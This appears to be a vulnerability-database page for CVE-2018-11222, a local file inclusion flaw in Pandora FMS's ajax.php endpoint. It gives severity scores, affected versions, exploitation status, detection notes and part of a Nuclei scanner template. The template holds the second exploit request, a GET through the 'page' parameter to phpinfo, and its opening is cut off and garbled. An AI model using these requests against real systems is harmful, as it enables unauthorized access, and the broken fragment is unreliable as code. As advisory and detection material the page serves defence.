CVE-2018-11222
Published 2018-06-16
CVE-2018-11222: Local File Inclusion (LFI) in Artica Pandora FMS through version 7.23 allows an attacker to call any php file via the /pandora_console/ajax.php ajax endpoint.
Priority: P2 · 75 · high · CVSS 3.0: 7.5
AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
ITW · EXPLOIT · VulnCheck KEV
Exploited in the wild
EPSS: 5.62% (92.0th percentile)
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| artica | pandora_fms | <= 7.23 | — |
Detection & IOCs
- The LFI is exploitable through the 'page' parameter of the ajax.php endpoint. Any PHP file on the server can be called, not just phpinfo, so detection rules should account for arbitrary file references, not just known payloads.
- The exploit chain is a two-step process: first extracting a path via a multipart POST, then using that path in a GET request. Single-request detection may miss the full attack chain.
CVSS provenance
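| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.0 | 7.5 | HIGH | CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N |
| nvd | v2.0 | 5.0 | MEDIUM | AV:N/AC:L/Au:N/C:P/I:N/A:N |
| vulncheck | | 7.5 | HIGH | |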
GHSA
GHSA-2jph-rj29-p72m: Local File Inclusion (LFI) in Artica Pandora FMS through version 7
ghsa_unreviewed·2022-05-14
CVE-2018-11222 [HIGH] CWE-20 GHSA-2jph-rj29-p72m: Local File Inclusion (LFI) in Artica Pandora FMS through version 7
Local File Inclusion (LFI) in Artica Pandora FMS through version 7.23 allows an attacker to call any php file via the /pandora_console/ajax.php ajax endpoint.
VulnCheck
artica pandora_fms Improper Input Validation
vulncheck·2018·CVSS 7.5
CVE-2018-11222 [HIGH] artica pandora_fms Improper Input Validation
Local File Inclusion (LFI) in Artica Pandora FMS through version 7.23 allows an attacker to call any php file via the /pandora_console/ajax.php ajax endpoint.
Affected: artica pandora_fms
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-11-26&host_type=src&vulnerability=cve-2018-11222; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-12-15&host_type=src&vulnerability=cve-2018-11222; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-12-18&host_type=src&vulnerability
No detection rules found.
Nuclei
Pandora FMS <=7.0NG.722 - Remote Code Execution
nuclei·CVSS 9.8
CVE-2018-11222 [CRITICAL] Pandora FMS <=7.0NG.722 - Remote Code Execution
Pandora FMS ')}}
--------------------------Sh5BXowDBYvdaiPqkMSZas--
```yaml
    matchers:
      - type: word
        part: body
        words:
          - '"status":"success"'
          - '"package":"'
        condition: and
    extractors:
      - type: regex
        name: path
        part: body
        group: 1
        regex:
          - '"package":"(.*?)"'
        internal: true
  - raw:
      - |
        GET /pandora_console/ajax.php?page={{replace(path,"\\","")}}/plugin/phpinfo HTTP/1.1
        Host: {{Hostname}}
    matchers:
      - type: word
        part: body
        words:
          - '{{marker}}'
# digest: 4b0a00483046022100f100868d28b50ad562b86c5c0c4a11983f1f70340f322c1c726628e56e723e36022100a285ffdb63a34ec32535ef05645036f58b781544980b6c0699a76d690233feb3:922c64590222798bb761d5b6d8e72950
```